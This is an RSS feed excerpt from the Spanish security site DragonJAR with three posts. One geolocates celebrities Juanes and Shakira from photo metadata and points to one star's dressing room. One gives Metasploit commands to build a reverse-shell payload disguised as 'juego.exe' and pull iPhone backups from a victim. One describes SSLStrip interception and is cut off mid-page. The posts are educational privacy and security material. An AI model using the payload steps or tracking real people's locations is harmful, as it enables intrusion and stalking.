<?xml version="1.0" encoding="UTF-8"?> <rss
version="2.0"
xmlns:content="http://purl.org/rss/1.0/modules/content/"
xmlns:wfw="http://wellformedweb.org/CommentAPI/"
xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
><channel><title>La Comunidad DragonJAR &#187; Espiar</title> <atom:link href="http://www.dragonjar.org/tag/espiar/feed" rel="self" type="application/rss+xml" /><link>http://www.dragonjar.org</link> <description>Noticias de actualidad y seguridad informática, herramientas de seguridad, documentación y una excelente COMUNIDAD.</description> <lastBuildDate>Sat, 11 Feb 2012 22:13:24 +0000</lastBuildDate> <language>en</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=3.3.1</generator> <item><title>Cómo localizar usuarios de twitter y flickr a través de sus fotos</title><link>http://www.dragonjar.org/como-localizar-usuarios-de-twitter-y-flickr-a-traves-de-sus-fotos.xhtml</link> <comments>http://www.dragonjar.org/como-localizar-usuarios-de-twitter-y-flickr-a-traves-de-sus-fotos.xhtml#comments</comments> <pubDate>Sun, 04 Dec 2011 05:31:08 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Artículos sobre seguridad]]></category> <category><![CDATA[Protección de la Información]]></category> <category><![CDATA[Espiar]]></category> <category><![CDATA[Flickr]]></category> <category><![CDATA[Fotos]]></category> <category><![CDATA[geoposicion]]></category> <category><![CDATA[GPS]]></category> <category><![CDATA[posición]]></category> <category><![CDATA[Twitter]]></category> <category><![CDATA[ubicar]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=6196</guid> <description><![CDATA[ACTUALIZADO: Este articulo fue citado por la W Radio en Colombia, además del periódico El Diario y Opinion de Bolivia, por tanto lo dejo de nuevo en portada para facilitar su búsqueda a los posibles lectores de esos medios. También les cuento que de momento la herramienta esta teniendo problemas para autenticarse ante twitter, por [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2011/04/Geolocalizacion.jpg" width="240" title="Cómo localizar usuarios de twitter y flickr a través de sus fotos" alt="Geolocalizacion Cómo localizar usuarios de twitter y flickr a través de sus fotos" /></p><p
style="text-align: justify;"><strong>ACTUALIZADO:</strong> Este articulo fue citado por la <a
href="https://twitter.com/#!/JoseFalla_R/status/146257900803858432">W Radio en Colombia</a>, además del periódico <a
href="http://www.impre.com/eldiariony/tecnologia/2011/12/12/revelan-fotos-ubicacion-de-per-286629-1.html">El Diario</a> y <a
href="http://www.opinion.com.bo/opinion/articulos/2011/1212/noticias.php?id=35141">Opinion de Bolivia</a>, por tanto lo dejo de nuevo en portada para facilitar su búsqueda a los posibles lectores de esos medios.</p><p
style="text-align: justify;">También les cuento que de momento la herramienta esta <a
href="http://ilektrojohn.github.com/creepy/">teniendo problemas para autenticarse ante twitter, por lo que se recomienda seguir los pasos sugeridos por el autor de la misma en este enlace</a>.</p><p
style="text-align: justify;">La geolocalización esta en auge, todos quieren saber donde están sus amigos y gustosos dan su información en sitios como <a
href="http://www.foursquare.com">Foursquare</a>, <a
href="http://www.dioui.com/">DiOui</a> o <a
href="http://www.facebook.com/places/">Facebook Places</a> para no estar fuera de la &#8220;moda&#8221;, pero&#8230; ¿sabes quien ve realmente esta información?, muchas veces quienes publican estos datos en la red, no son conscientes de las consecuencias que esto puede acarrear.</p><p
style="text-align: center;"><img
class="aligncenter size-full wp-image-6212" title="Geolocalizacion de usuarios Twitter y Flickr" src="http://www.dragonjar.org/wp-content/uploads/2011/04/Geolocalizacion.jpg" alt="Geolocalizacion Cómo localizar usuarios de twitter y flickr a través de sus fotos" width="580" height="369" /></p><p
style="text-align: justify;"><a
href="http://geek.com.mx/2008/08/acusan-a-hi5-y-facebook-de-facilitar-secuestros/">Secuestradores</a>, <a
href="http://terratv.terra.com.ar/videos/Noticias/Nacional/5141-233932/Cayo-el-violador-de-Facebook-por-atacar-sexualmente-a-menor-de-14-anos.htm">Violadores</a>, <a
href="http://www.gizmodo.es/2010/09/13/ladrones-consultan-facebook-para-ver-cuando-asaltar-tu-casa.html">Ladrones</a> y demás delincuentes <a
href="http://pleaserobme.com/">ya hacen uso de las nuevas tecnologías y la información que publicas en internet</a>, para llevar a cabo sus delitos, como en el famoso caso de <a
href="http://www.securitybydefault.com/2011/05/la-espeluznante-historia-de-lisa.html">Lisa Montgomery</a>; por eso debes ser consciente que la información que publicas en la red la puede ver CUALQUIER PERSONA y te recomendamos seguir los <a
href="http://www.dragonjar.org/consejos-para-hacer-correcto-uso-de-las-redes-sociales.xhtml">consejos</a> que constantemente <a
href="http://www.dragonjar.org/configurar-privacidad-en-redes-sociales.xhtml">ofrecemos en nuestra comunidad, para estar un poco mas seguros en la red</a>.<span
id="more-6196"></span></p><p
style="text-align: justify;">Esta información es especialmente sensible cuando quien la publica, no es consciente que lo está haciendo, como es el caso de las <a
href="http://www.dragonjar.org/tag/fotos" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Fotos">fotos</a> en cuyo interior (<a
href="http://es.wikipedia.org/wiki/Metadato">sus metadatos</a>) se encuentra almacenada la ubicación <a
href="http://www.dragonjar.org/tag/gps" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con GPS">GPS</a> de donde fue tomada, una característica adoptada cada vez en mas cámaras, especialmente las integradas a teléfonos celulares inteligentes.</p><p
style="text-align: justify;">Gracias a <a
href="http://www.elladodelmal.com/2011/04/creepy-data.html">El Maligno</a>, me entero que <a
href="http://diveintoinfosec.wordpress.com/">Yiannis Kakavas</a> ha desarrollado <a
href="https://github.com/ilektrojohn/creepy/">una herramienta llamada Cree.py</a>, que automatiza el proceso de extracción y localización de la información GPS publicada en las fotos por un usuario de <a
href="http://www.dragonjar.org/tag/twitter" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Twitter">Twitter</a> o <a
href="http://www.dragonjar.org/tag/flickr" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Flickr">Flickr</a>, dejándola a la mano de cualquier persona.</p><p
style="text-align: justify;">La herramienta programada en Python y de código abierto, es muy fácil de utilizar, cuenta con versiones para <a
href="http://cloud.github.com/downloads/ilektrojohn/creepy/CreepySetup_0.1.93.exe">Windows</a>, <a
href="http://cloud.github.com/downloads/ilektrojohn/creepy/creepy_0.1.93-1ubuntu1_all.deb">GNU Linux</a> y si resolvemos unas cuentas dependencias, <a
href="https://github.com/ilektrojohn/creepy/zipball/master">podemos hacerla correr en Mac OS X</a>.</p><p>Para este articulo analizaremos 2 de los famosos colombianos, que mas publican fotografías por Twitter&#8230;. <a
href="http://twitter.com/#!/juanes">@juanes</a> y <a
href="http://twitter.com/#!/shakira">@Shakira</a></p><p><img
class="aligncenter size-full wp-image-6200" title="Ubicando famosos en Twitter" src="http://www.dragonjar.org/wp-content/uploads/2011/04/Juanes-GPS1.jpg" alt="Juanes GPS1 Cómo localizar usuarios de twitter y flickr a través de sus fotos" width="580" height="451" /></p><p
style="text-align: justify;">Lo primero que hacemos es abrir la herramienta, escribir la cuenta de Twitter o Flickr que queremos analizar (podemos usar un buscador también) y después presionar <strong>&#8220;Geolocate Targe&#8221;</strong>, esperamos unos minutos mientras se procesa la información&#8230;. obteniendo un mapa como el siguiente, donde podemos ver los puntos geolocalizados de las fotos obtenidas desde el perfil publico de @juanes</p><p
style="text-align: center;"><img
class="aligncenter size-full wp-image-6201" title="Juanes-GPS9" src="http://www.dragonjar.org/wp-content/uploads/2011/04/Juanes-GPS9.jpg" alt="Juanes GPS9 Cómo localizar usuarios de twitter y flickr a través de sus fotos" width="580" height="450" /></p><p
style="text-align: justify;">Para confirmar la información almacenada analizaremos las fotos descargadas por el Cree.py, con la FOCA, herramienta que permite analizar metadatos a imágenes y documentos.</p><p><img
class="aligncenter size-full wp-image-6203" title="Juanes-GPS2" src="http://www.dragonjar.org/wp-content/uploads/2011/04/Juanes-GPS2.jpg" alt="Juanes GPS2 Cómo localizar usuarios de twitter y flickr a través de sus fotos" width="580" height="371" /></p><p>Fotos bastante personales de @Juanes con su esposa Karen Martínez mientras estaban de viaje por Londres.</p><p
style="text-align: center;"><img
class="aligncenter size-full wp-image-6204" title="Juanes-GPS3" src="http://www.dragonjar.org/wp-content/uploads/2011/04/Juanes-GPS3.jpg" alt="Juanes GPS3 Cómo localizar usuarios de twitter y flickr a través de sus fotos" width="580" height="372" /></p><p>La ubicación de la oficina donde posiblemente produzcan los discos del artista</p><p
style="text-align: center;"><img
class="aligncenter size-full wp-image-6205" title="Juanes-GPS4" src="http://www.dragonjar.org/wp-content/uploads/2011/04/Juanes-GPS4.jpg" alt="Juanes GPS4 Cómo localizar usuarios de twitter y flickr a través de sus fotos" width="580" height="374" /></p><p>Haciendo arreglos a las canciones o las pistas&#8230;</p><p
style="text-align: center;"><img
class="aligncenter size-full wp-image-6206" title="Juanes-GPS5" src="http://www.dragonjar.org/wp-content/uploads/2011/04/Juanes-GPS5.jpg" alt="Juanes GPS5 Cómo localizar usuarios de twitter y flickr a través de sus fotos" width="580" height="374" /></p><p>Fotos del parque que se observa claramente en Creppy</p><p
style="text-align: center;"><img
class="aligncenter size-full wp-image-6207" title="Juanes-GPS6" src="http://www.dragonjar.org/wp-content/uploads/2011/04/Juanes-GPS6.jpg" alt="Juanes GPS6 Cómo localizar usuarios de twitter y flickr a través de sus fotos" width="580" height="372" /></p><p>Segunda foto del Hyde Park</p><p
style="text-align: center;"><img
class="aligncenter size-full wp-image-6208" title="Juanes-GPS7" src="http://www.dragonjar.org/wp-content/uploads/2011/04/Juanes-GPS7.jpg" alt="Juanes GPS7 Cómo localizar usuarios de twitter y flickr a través de sus fotos" width="580" height="375" /></p><p
style="text-align: justify;">Como podemos ver no es poca la información que cualquier persona puede obtener de la cuenta publica de Juanes, ¿los paparazzi sabrán de esto?, seguramente les sería de mucha utilidad&#8230;.</p><p
style="text-align: justify;">Ahora pasamos a otra de nuestras celebridades&#8230; @shakira quien tampoco sabe que al publicar fotografías por Twitter, también esta publicando su ubicación, para ello seguimos el mismo procedimiento que con @juanes, buscamos su cuenta oficial, damos click en el botón <strong>&#8220;Geolocate Target&#8221;</strong> y esperamos que Cree.py haga su trabajo&#8230;</p><p
style="text-align: center;"><img
class="aligncenter size-full" src="http://www.dragonjar.org/wp-content/uploads/2011/05/Shakira-GPS1.jpg" alt="Shakira GPS1 Cómo localizar usuarios de twitter y flickr a través de sus fotos"  title="Cómo localizar usuarios de twitter y flickr a través de sus fotos" /></p><p>Después de esperar un poco, podemos ver algunas locaciones como el Coca Cola Park en South Africa.</p><p
style="text-align: center;"><img
class="aligncenter size-full" src="http://www.dragonjar.org/wp-content/uploads/2011/05/Shakira-GPS2.jpg" alt="Shakira GPS2 Cómo localizar usuarios de twitter y flickr a través de sus fotos"  title="Cómo localizar usuarios de twitter y flickr a través de sus fotos" /></p><p>Algunas direcciones en New York&#8230;</p><p
style="text-align: center;"><img
class="aligncenter size-full" src="http://www.dragonjar.org/wp-content/uploads/2011/05/Shakira-GPS3.jpg" alt="Shakira GPS3 Cómo localizar usuarios de twitter y flickr a través de sus fotos"  title="Cómo localizar usuarios de twitter y flickr a través de sus fotos" /></p><p>Y para corroborar el trabajo de cree.py de nuevo pasamos la FOCA a todas las fotos, logrando reconocer algunas de ellas.</p><p
style="text-align: center;"><img
class="aligncenter size-full" src="http://www.dragonjar.org/wp-content/uploads/2011/05/Shakira-GPS4.jpg" alt="Shakira GPS4 Cómo localizar usuarios de twitter y flickr a través de sus fotos"  title="Cómo localizar usuarios de twitter y flickr a través de sus fotos" /></p><p>Shakira con su novio de turno&#8230;</p><p
style="text-align: center;"><img
class="aligncenter size-full" src="http://www.dragonjar.org/wp-content/uploads/2011/05/Shakira-GPS5.jpg" alt="Shakira GPS5 Cómo localizar usuarios de twitter y flickr a través de sus fotos"  title="Cómo localizar usuarios de twitter y flickr a través de sus fotos" /></p><p>Foto del escenario antes de la presentación&#8230;</p><p
style="text-align: center;"><img
class="aligncenter size-full" src="http://www.dragonjar.org/wp-content/uploads/2011/05/Shakira-GPS6.jpg" alt="Shakira GPS6 Cómo localizar usuarios de twitter y flickr a través de sus fotos"  title="Cómo localizar usuarios de twitter y flickr a través de sus fotos" /></p><p>Ubicación de su camerino&#8230; ya sabes por si quieres darle un saludo&#8230;</p><p
style="text-align: center;"><img
class="aligncenter size-full" src="http://www.dragonjar.org/wp-content/uploads/2011/05/Shakira-GPS7.jpg" alt="Shakira GPS7 Cómo localizar usuarios de twitter y flickr a través de sus fotos"  title="Cómo localizar usuarios de twitter y flickr a través de sus fotos" /></p><p>En un late night show&#8230;</p><p
style="text-align: center;"><img
class="aligncenter size-full" src="http://www.dragonjar.org/wp-content/uploads/2011/05/Shakira-GPS8.jpg" alt="Shakira GPS8 Cómo localizar usuarios de twitter y flickr a través de sus fotos"  title="Cómo localizar usuarios de twitter y flickr a través de sus fotos" /></p><p>Algunos apuntes poco interesantes&#8230; ¿o no?</p><p
style="text-align: center;"><img
class="aligncenter size-full" src="http://www.dragonjar.org/wp-content/uploads/2011/05/Shakira-GPS9.jpg" alt="Shakira GPS9 Cómo localizar usuarios de twitter y flickr a través de sus fotos"  title="Cómo localizar usuarios de twitter y flickr a través de sus fotos" /></p><p>Detrás del telón&#8230;</p><p
style="text-align: center;"><img
class="aligncenter size-full" src="http://www.dragonjar.org/wp-content/uploads/2011/05/Shakira-GPS10.jpg" alt="Shakira GPS10 Cómo localizar usuarios de twitter y flickr a través de sus fotos"  title="Cómo localizar usuarios de twitter y flickr a través de sus fotos" /></p><p>En el escenario..</p><p>Como pueden ver obtener la ubicación de los famosos no es nada complicado, pero es igual de fácil obtener la tuya; Por eso es tan importante que sigas los <a
href="http://www.dragonjar.org/consejos-para-hacer-correcto-uso-de-las-redes-sociales.xhtml">consejos</a> que constantemente <a
href="http://www.dragonjar.org/configurar-privacidad-en-redes-sociales.xhtml">ofrecemos en nuestra comunidad, para estar un poco mas seguros en la red</a> y seas mas cuidadoso con tu información.</p><p><strong>Mas Información:</strong><br
/> <a
href="https://github.com/ilektrojohn/creepy">Pagina oficial del Proyecto Cree.py</a></p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/ubicando-a-los-duenos-de-un-iphone-o-ipad.xhtml" title="Ubicando a los dueños de un iPhone o iPad">Ubicando a los dueños de un iPhone o iPad</a></li><li><a
href="http://www.dragonjar.org/configurar-privacidad-en-redes-sociales.xhtml" title="¿Cómo Configurar la Privacidad en las Redes Sociales?">¿Cómo Configurar la Privacidad en las Redes Sociales?</a></li><li><a
href="http://www.dragonjar.org/como-recuperar-una-cuenta-de-twitter.xhtml" title="¿Cómo Recuperar una Cuenta de Twitter? ">¿Cómo Recuperar una Cuenta de Twitter? </a></li><li><a
href="http://www.dragonjar.org/recupera-tu-password-de-twitter.xhtml" title="Recupera tu Password de Twitter">Recupera tu Password de Twitter</a></li><li><a
href="http://www.dragonjar.org/nuevo-gusano-en-twitter.xhtml" title="Nuevo Gusano en Twitter">Nuevo Gusano en Twitter</a></li><li><a
href="http://www.dragonjar.org/wargame-reto-panda-2010.xhtml" title="WarGame Reto Panda 2010">WarGame Reto Panda 2010</a></li><li><a
href="http://www.dragonjar.org/la-policia-nacional-colombiana-en-las-redes-sociales.xhtml" title="La Policía Nacional Colombiana en las Redes Sociales ">La Policía Nacional Colombiana en las Redes Sociales </a></li><li><a
href="http://www.dragonjar.org/revisa-tu-privacidad-en-facebook.xhtml" title="Revisa tu privacidad en Facebook">Revisa tu privacidad en Facebook</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/como-localizar-usuarios-de-twitter-y-flickr-a-traves-de-sus-fotos.xhtml/feed</wfw:commentRss> <slash:comments>33</slash:comments> </item> <item><title>Ubicando a los dueños de un iPhone o iPad</title><link>http://www.dragonjar.org/ubicando-a-los-duenos-de-un-iphone-o-ipad.xhtml</link> <comments>http://www.dragonjar.org/ubicando-a-los-duenos-de-un-iphone-o-ipad.xhtml#comments</comments> <pubDate>Fri, 29 Apr 2011 03:33:48 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Seguridad móvil]]></category> <category><![CDATA[consolidated.db]]></category> <category><![CDATA[Espiar]]></category> <category><![CDATA[geoposicion]]></category> <category><![CDATA[GPS]]></category> <category><![CDATA[iPad]]></category> <category><![CDATA[IPhone]]></category> <category><![CDATA[posición]]></category> <category><![CDATA[ubicar]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=6184</guid> <description><![CDATA[Hace unos días Pete Warden y Alasdair Allen publicaron una investigación en la que descubrieron un archivo con nombre consolidated.db en cuyo interior se encuentra almacenado un registro de las ultimas ubicaciones donde estuviéramos con nuestro dispositivo iOS. La noticia le dió la vuelta al mundo en poco tiempo, logrando que Steve Jobs se pronunciara al respecto y saliera con la ya típica [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2011/04/iPhone-GPS.png" width="240" title="Ubicando a los dueños de un iPhone o iPad" alt="iPhone GPS Ubicando a los dueños de un iPhone o iPad" /></p><p>Hace unos días Pete Warden y Alasdair Allen publicaron una investigación en la que descubrieron un archivo con nombre <em><strong><a
href="http://www.dragonjar.org/tag/consolidated-db" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con consolidated.db">consolidated.db</a></strong></em> en cuyo interior se encuentra almacenado un registro de las ultimas ubicaciones donde estuviéramos con nuestro dispositivo iOS.</p><p>La noticia le dió la vuelta al mundo en poco tiempo, logrando que Steve Jobs se pronunciara al respecto y saliera con la ya típica respuesta, <a
href="http://www.enter.co/movilidad/apple-no-espia-a-sus-clientes-google-si-steve-jobs/">&#8220;no lo hacemos, nuestra competencia sí&#8221;</a>, pero por mucho que Jobs niegue el asunto, es un hecho que el archivo existe y que en él se encuentra un registro de nuestros pasos mientras tenemos nuestro dispositivo en el bolsillo, en este artículo vamos a ver los distintos métodos que tenemos para <a
href="http://www.dragonjar.org/tag/ubicar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con ubicar">ubicar</a> el archivo Consolidated.db, obtener e interpretar este registro.</p><p>La primera herramienta que veremos es <a
href="http://petewarden.github.com/iPhoneTracker/">iPhone Tracker</a>, publicada por Warden y  Allen junto con su investigación que de momento funciona solo en Mac OS X.</p><h2>Obteniendo Geoposición de <a
href="http://www.dragonjar.org/tag/iphone" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con IPhone">iPhone</a> con <a
href="http://www.dragonjar.org/tag/iphone" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con IPhone">iPhone</a> Tracker</h2><p>Primero que todo debemos obtener una copia del iPhone Tracker y para ello tenemos dos opciones</p><ol><li><a
href="https://github.com/petewarden/iPhoneTracker">Descargamos el código fuente, lo leemos y compilamos con XCode</a> (recomendada)</li><li><a
href="http://static.openheatmap.com.s3.amazonaws.com/iPhoneTracker.app.zip">Descargar la aplicación compilada y ejecutarla en tu sistema</a></li></ol><p>De cualquiera de las dos formas, cuando ejecutamos la aplicación tenemos algo como esto:</p><p
style="text-align: center;"><a
href="http://www.dragonjar.org/wp-content/uploads/2011/05/iPhoneTracker.jpg"><img
class="aligncenter size-full wp-image-6185" title="iPhone Tracker" src="http://www.dragonjar.org/wp-content/uploads/2011/05/iPhoneTracker.jpg" alt="iPhoneTracker Ubicando a los dueños de un iPhone o iPad" width="579" height="429" /></a></p><p>Donde el punto azul es el registro de nuestra <a
href="http://www.dragonjar.org/tag/posicion" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con posición">posición</a> y a medida que aumentamos el zoom de la imagen, tendremos mas detalle de este registro; Como pueden ver, el proceso es bastante sencillo y cualquier persona puede hacerlo si tienen un equipo con Mac OS X.</p><p>Pero los usuarios de windows también tienen varias herramientas para obtener este listado..</p><h2>Obteniendo Geoposición de iPhone en Windows</h2><p>Para sacar la posición <a
href="http://www.dragonjar.org/tag/gps" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con GPS">GPS</a> almacenada en el archivo <em><strong>consolidated.db</strong></em> en sistemas Microsoft Windows tenemos varias opciones, la primera <a
href="http://www.raphaelabitbol.info/2011/04/22/iphone-tracker-sous-windows/">iPhone Tracking for Windows</a>.</p><p
style="text-align: center;"><a
href="http://www.dragonjar.org/wp-content/uploads/2011/05/iPhoneTrackerWin.jpg"><img
class="aligncenter size-full wp-image-6186" title="iPhone Tracker para Windows" src="http://www.dragonjar.org/wp-content/uploads/2011/05/iPhoneTrackerWin.jpg" alt="iPhoneTrackerWin Ubicando a los dueños de un iPhone o iPad" width="580" height="373" /></a></p><p>Con el que podemos ubicar automáticamente el archivo <em><strong>consolidated.db</strong></em> de nuestro backup, delimitar las fechas en las que hicimos un recorrido y posicionar en un mapa las ultimas ubicaciones almacenadas por nuestro dispositivo.</p><p>La otra opción que tenemos en Windows es <a
href="http://huseyint.com/iPhoneTrackerWin/">iPhoneTrackerWin</a>, que como funcionalidad adicional, permite cargar el archivo <em><strong>consolidated.db</strong></em> de otras fuentes, por lo que si obtenemos el backup de otro iPhone, podemos visualizarlo gráficamente gracias a este software.</p><p
style="text-align: center;"><a
href="http://www.dragonjar.org/wp-content/uploads/2011/05/iPhoneTrackerWin2.jpg"><img
class="aligncenter size-full wp-image-6187" title="iPhone Tracker Win" src="http://www.dragonjar.org/wp-content/uploads/2011/05/iPhoneTrackerWin2.jpg" alt="iPhoneTrackerWin2 Ubicando a los dueños de un iPhone o iPad" width="580" height="380" /></a></p><p
style="text-align: left;">Como muchos han dicho ya el archivo <em><strong>consolidated.db</strong></em> es en realidad una base de datos en sqlite por lo que con <a
href="http://www.google.com.co/search?hl=es&amp;q=frontend+sqlite&amp;aq=f&amp;aqi=g10&amp;aql=&amp;oq=">cualquier FrontEnd de SQLite puedes visualizar la información de este archivo</a>, aunque no gráficamente como las herramientas mencionadas anteriormente.</p><h2>Obteniendo el Backup del iPhone/<a
href="http://www.dragonjar.org/tag/ipad" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con iPad">iPad</a> con Metasploit</h2><p>Si estamos realizando una auditoria de seguridad y sabemos que un funcionario de la organización auditada, cuenta con un dispositivo iOS con 3G (iPad o iPhone), podemos obtener la información de este dispositivo, por medio de un nuevo modulo con nombre <strong><a
href="https://dev.metasploit.com/redmine/projects/framework/repository/revisions/12425/entry/modules/post/multi/gather/apple_ios_backup.rb">apple_ios_backup</a></strong> desarrollado por el propio <strong>H.D. Moore</strong>, creador de nuestro framework favorito Metasploit.</p><p>Debemos tener una sección de meterpreter en el equipo donde tenemos el backup, para ello vamos a generar un binario con el meterpreter y por medio de ingeniería social, lograremos que lo ejecuten en el equipo donde se encuentra el backup.</p><pre class="brush:shell">dragon@bt:~# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.13 X &gt; juego.exe</pre><p>Mientras dejamos a la escucha el handler que recibirá la conexión del ejecutable juego.exe</p><pre class="brush:shell">dragon@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.13 E</pre><p>El ejecutable lo podemos empaquetar junto a cualquier otro programa  y lograr que lo corran en el equipo deseado, una vez tenemos una sección meterpreter en la maquina, ejecutamos el modulo de <strong><a
href="https://dev.metasploit.com/redmine/projects/framework/repository/revisions/12425/entry/modules/post/multi/gather/apple_ios_backup.rb">apple_ios_backup</a></strong> para sacar las bases de datos (localización, mensajes sms, imágenes, archivos de preferencias).</p><pre class="brush:shell">meterpreter &gt; run windows/gather/apple_ios_backup</pre><p>Si el equipo víctima es un <strong>Vista</strong> o <strong>Windows 7</strong> seguramente no tendrás problemas, pero si el equipo víctima es un Windows XP en español como en mi caso, tendremos que echarle mano al archivo <strong>modules/post/windows/gather/apple_ios_backup.rb</strong> como seguramente muchas veces te ha tocado hacer y cambiar las rutas para que funcionen en los sistemas XP con idioma español.</p><pre class="brush:ruby">			if os =~ /Windows 7|Vista|2008/
				@appdata = '\\AppData\\Roaming'
				@users = drive + '\\Users'
			else
				@appdata = '\\Application Data'
				@users = drive + '\\Documents and Settings'
			end</pre><p>En la linea 61 cambiamos <strong>&#8220;\\Application Data&#8221;</strong> por &#8220;<strong>\\Datos de programa&#8221;</strong> y probamos de nuevo consiguiendo que el modulo creado por <strong>H.D. Moore</strong> funcione sin problemas, obteniendo los backups almacenados en la maquina.</p><p>Por último les dejo un vídeo donde Alasdair Allan habla sobre este problema en los dispositivos de Apple.</p><p
style="text-align: center;">&nbsp;</p><p>Espero que les sea de utilidad este texto y dejen sus comentarios abajo&#8230;</p><h3  class="related_post_title">También puede interesarte...</h3><ul
class="related_post"><li><a
href="http://www.dragonjar.org/como-localizar-usuarios-de-twitter-y-flickr-a-traves-de-sus-fotos.xhtml" title="Cómo localizar usuarios de twitter y flickr a través de sus fotos">Cómo localizar usuarios de twitter y flickr a través de sus fotos</a></li><li><a
href="http://www.dragonjar.org/las-peores-contrasenas-para-el-iphone-ipod-o-ipad.xhtml" title="Las peores Contraseñas para el iPhone, iPod o iPad ">Las peores Contraseñas para el iPhone, iPod o iPad </a></li><li><a
href="http://www.dragonjar.org/cuidado-con-las-copias-chinas-de-productos-apple.xhtml" title="Cuidado con las copias chinas de productos Apple">Cuidado con las copias chinas de productos Apple</a></li><li><a
href="http://www.dragonjar.org/recuperar-el-codigo-contrasena-de-iphone-ipod-touch-o-ipad.xhtml" title="Recuperar el Codigo (Contraseña) de iPhone, iPod Touch o iPad">Recuperar el Codigo (Contraseña) de iPhone, iPod Touch o iPad</a></li><li><a
href="http://www.dragonjar.org/descargar-firmware-ios-para-iphone-ipod-touch-ipad-y-apple-tv.xhtml" title="Descargar Firmware (iOS) para iPhone, iPod Touch, iPad y Apple TV">Descargar Firmware (iOS) para iPhone, iPod Touch, iPad y Apple TV</a></li><li><a
href="http://www.dragonjar.org/como-construir-aplicaciones-seguras-para-ios-iphone-ipad-ipod-touch.xhtml" title="Cómo construir aplicaciones seguras para iOS (iPhone, iPad, iPod Touch)">Cómo construir aplicaciones seguras para iOS (iPhone, iPad, iPod Touch)</a></li><li><a
href="http://www.dragonjar.org/jailbreak-a-cualquier-iphone-ipod-touch-e-ipad.xhtml" title="Jailbreak a Cualquier iPhone, iPod Touch e iPad">Jailbreak a Cualquier iPhone, iPod Touch e iPad</a></li><li><a
href="http://www.dragonjar.org/ipad-wiimote-consola-arcade-portable.xhtml" title="iPad + Wiimote = Consola Arcade Portable">iPad + Wiimote = Consola Arcade Portable</a></li></ul>]]></content:encoded> <wfw:commentRss>http://www.dragonjar.org/ubicando-a-los-duenos-de-un-iphone-o-ipad.xhtml/feed</wfw:commentRss> <slash:comments>5</slash:comments> </item> <item><title>SSLStrip &#8211; Espiando tráfico SSL</title><link>http://www.dragonjar.org/sslstrip-espiando-trafico-ssl.xhtml</link> <comments>http://www.dragonjar.org/sslstrip-espiando-trafico-ssl.xhtml#comments</comments> <pubDate>Sun, 30 May 2010 08:20:10 +0000</pubDate> <dc:creator>DragoN</dc:creator> <category><![CDATA[Criptografia]]></category> <category><![CDATA[Herramientas Seguridad]]></category> <category><![CDATA[Espiar]]></category> <category><![CDATA[SSL]]></category> <category><![CDATA[SSLStrip]]></category> <category><![CDATA[Tutorial]]></category> <category><![CDATA[Video]]></category><guid
isPermaLink="false">http://www.dragonjar.org/?p=4436</guid> <description><![CDATA[Desde que Moxie Moulinsart mostró su SSLStrip en Blackhat, el MODO PARANOICO de muchas personas quedó encendido y no es para menos, ya que con esta herramienta cualquier persona puede espiar tu trafico SSL sin problemas. El funcionamiento de SSLStrip es simple, reemplaza todas las peticiones &#8220;https://&#8221; de una página web por &#8220;http://&#8221; y luego [...]]]></description> <content:encoded><![CDATA[<p
style="float:right; margin:0 0 10px 15px; width:240px;"> <img
src="http://www.dragonjar.org/wp-content/uploads/2010/06/sslstript.jpg" width="240" title="SSLStrip   Espiando tráfico SSL" alt="sslstript SSLStrip   Espiando tráfico SSL" /></p><p><a
href="http://www.dragonjar.org/sin-ssl-y-ahora-quien-podra-defendernos.xhtml">Desde que Moxie Moulinsart mostró su SSLStrip en Blackhat</a>, el MODO PARANOICO de muchas personas quedó encendido y no es para menos, ya que con esta herramienta cualquier persona puede <a
href="http://www.dragonjar.org/tag/espiar" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con Espiar">espiar</a> tu trafico <a
href="http://www.dragonjar.org/tag/ssl" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SSL">SSL</a> sin problemas.</p><p
style="text-align: center;"><img
class="aligncenter" src="http://www.dragonjar.org/wp-content/uploads/2010/06/sslstrip.jpg" alt="sslstrip SSLStrip   Espiando tráfico SSL"  title="SSLStrip   Espiando tráfico SSL" /></p><p>El funcionamiento de <a
href="http://www.dragonjar.org/tag/sslstrip" class="st_tag internal_tag" rel="tag" title="Entradas etiquetadas con SSLStrip">SSLStrip</a> es simple, reemplaza todas las peticiones &#8220;https://&#8221; de una página web por &#8220;http://&#8221; y luego hacer un MITM entre el servidor y el cliente. La idea es que la víctima y el agresor se comuniquen a través de HTTP, mientras que el atacante y el servidor, se comunican a través de HTTPS con el certificado del servidor. Por lo tanto, el atacante es capaz de ver todo el tráfico en texto plano de la víctima.</p><p>A continuación les dejo vídeo, donde podemos apreciar en funcionamiento de esta excelente herramienta.</p><p
style="text-align: center;"><object
